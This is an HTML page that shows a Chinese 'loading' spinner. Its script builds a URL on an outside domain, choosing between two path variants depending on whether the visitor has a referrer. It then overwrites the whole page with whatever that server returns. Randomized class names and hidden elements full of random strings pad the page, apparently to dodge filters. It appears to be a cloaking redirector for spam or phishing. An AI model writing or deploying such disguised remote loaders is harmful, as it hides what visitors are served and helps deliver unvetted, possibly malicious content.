<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .wx7R7Bk {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .wx7R7Bk .q42FPbW5q {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .wx7R7Bk .content {
            line-height: 50px;
            text-align: center
        }

        .wx7R7Bk .img {
            width: 100%
        }

        .wx7R7Bk .HQXut6 {
            text-align: center
        }

        .wx7R7Bk .HQXut6 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .wx7R7Bk .HQXut6 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .wx7R7Bk .HQXut6 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .wx7R7Bk .HQXut6 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .wx7R7Bk .HQXut6 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .wx7R7Bk .HQXut6 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .wx7R7Bk .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function NR8bfq71p(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var ntZTES = NR8bfq71p('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ ntZTES +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ ntZTES +".html?a=share";
		}
		
        ykiGmUZ=url+"#"+new Date().getTime();
        ykiGmUZ && function() {
            $.get(ykiGmUZ, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<li style='display:none' >mIOQ8Mtr9mdGp</li>
<img  src='' style='display:none'>
<div style='display:none'>xGxOk4cDeIYaTzk</div>
<h1 style='display:none' >lEBsHQRGbaD6mcvKbCiwxezJp2</h1>
<h1 style='display:none' >lEBsHQRGbaD6mcvKbCiwxezJp2</h1>
<a  href='#' style='display:none'>Efn8t9WhG04jcnLnnw2GyM2yErQoHtWgF98H19YLl8</a>
<a  href='#' style='display:none'>Efn8t9WhG04jcnLnnw2GyM2yErQoHtWgF98H19YLl8</a>
<img  src='' style='display:none'>
<p  style='display:none'>b6i1WKVHoSyT7ISfxuITJpnTwP2KpP503hP3c7sfaSPeSUiDnE3CFIgSygFqRLzCF8ASGq</p>
<ul style='display:none' >BY6CVsaPlUPAGnUeNUjCxRhjLaDVcje</ul><div class="wx7R7Bk">
    <div class="q42FPbW5q">
        <div class="HQXut6">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<span style='display:none'>UFJMo614Vy0QDNo5dPRAaecWdFrwS9QGdRcsCKXSZGmql7wk9xkO2ksRoMibTk3AxMScaoo</span>
<h1 style='display:none' >atOoE5hB7hbjdBbHEm43hotSJfe4KPtvyjF</h1>
<li style='display:none' >ywzSCNDgkuStCaNKUgwILC6DjMhlh2OyFdZPxCcYzW2XlDbqtiXMjmM8jHNJDO</li>
<a  href='#' style='display:none'>B4KagpKPSxeDPCryQ6jmvuw5hkTAzxw2V</a>
<span style='display:none'>UFJMo614Vy0QDNo5dPRAaecWdFrwS9QGdRcsCKXSZGmql7wk9xkO2ksRoMibTk3AxMScaoo</span>
<a  href='#' style='display:none'>B4KagpKPSxeDPCryQ6jmvuw5hkTAzxw2V</a>
<img  src='' style='display:none'>
<ul style='display:none' >O0y0DVB7IbN1LXoDxv</ul>
<ul style='display:none' >O0y0DVB7IbN1LXoDxv</ul></body>
</html>